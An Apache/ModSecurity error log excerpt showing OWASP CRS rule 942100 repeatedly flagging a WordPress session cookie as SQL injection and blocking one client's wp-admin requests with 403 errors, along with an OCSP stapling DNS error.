[Mon May 11 18:33:12.088391 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEyDJnyuKVXoStDhbiuAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:12.088677 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEyDJnyuKVXoStDhbiuAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:13.082924 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEyDJnyuKVXoStDhbiuAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:13.390257 2026] [security2:error] [pid 1411055:tid 1411059] [client 150.109.12.46:56802] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agIEyUWKUxpmnkK7zHyr2QAAAQI"]
[Mon May 11 18:33:13.432663 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEyTJnyuKVXoStDhbiuwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:13.432953 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEyTJnyuKVXoStDhbiuwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:14.318502 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEyTJnyuKVXoStDhbiuwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:14.417164 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEyjJnyuKVXoStDhbivQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:14.417463 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEyjJnyuKVXoStDhbivQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:15.482784 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEyjJnyuKVXoStDhbivQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:15.589437 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEyzJnyuKVXoStDhbivgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:15.589723 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEyzJnyuKVXoStDhbivgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:15.966167 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEyzJnyuKVXoStDhbivgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:16.429634 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEzDJnyuKVXoStDhbiwAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:16.429915 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEzDJnyuKVXoStDhbiwAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:17.470835 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEzDJnyuKVXoStDhbiwAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:17.857749 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEzTJnyuKVXoStDhbiwgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:17.858047 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEzTJnyuKVXoStDhbiwgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:18.767693 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEzTJnyuKVXoStDhbiwgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:19.229563 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEzzJnyuKVXoStDhbiwwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:19.229892 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEzzJnyuKVXoStDhbiwwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:19.272975 2026] [ssl:error] [pid 1412074:tid 1412080] (EAI 2)Name or service not known: [client 34.241.242.231:35528] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:33:19.273079 2026] [ssl:error] [pid 1412074:tid 1412080] AH01941: stapling_renew_response: responder error
[Mon May 11 18:33:20.236047 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEzzJnyuKVXoStDhbiwwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:20.547491 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE0DJnyuKVXoStDhbixgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:20.547787 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE0DJnyuKVXoStDhbixgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:21.123193 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE0DJnyuKVXoStDhbixgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:21.216266 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE0TJnyuKVXoStDhbiyAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:21.216547 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE0TJnyuKVXoStDhbiyAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:22.041221 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE0TJnyuKVXoStDhbiyAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:22.493887 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE0kWKUxpmnkK7zHyr4AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:22.494792 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE0kWKUxpmnkK7zHyr4AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:22.926968 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE0kWKUxpmnkK7zHyr4AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:23.403693 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE00WKUxpmnkK7zHyr5wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:23.404031 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE00WKUxpmnkK7zHyr5wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:25.255617 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE00WKUxpmnkK7zHyr5wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:25.518582 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE1UWKUxpmnkK7zHyr7AAAARM"], referer: https://rentparadise.fr/wp-login.php
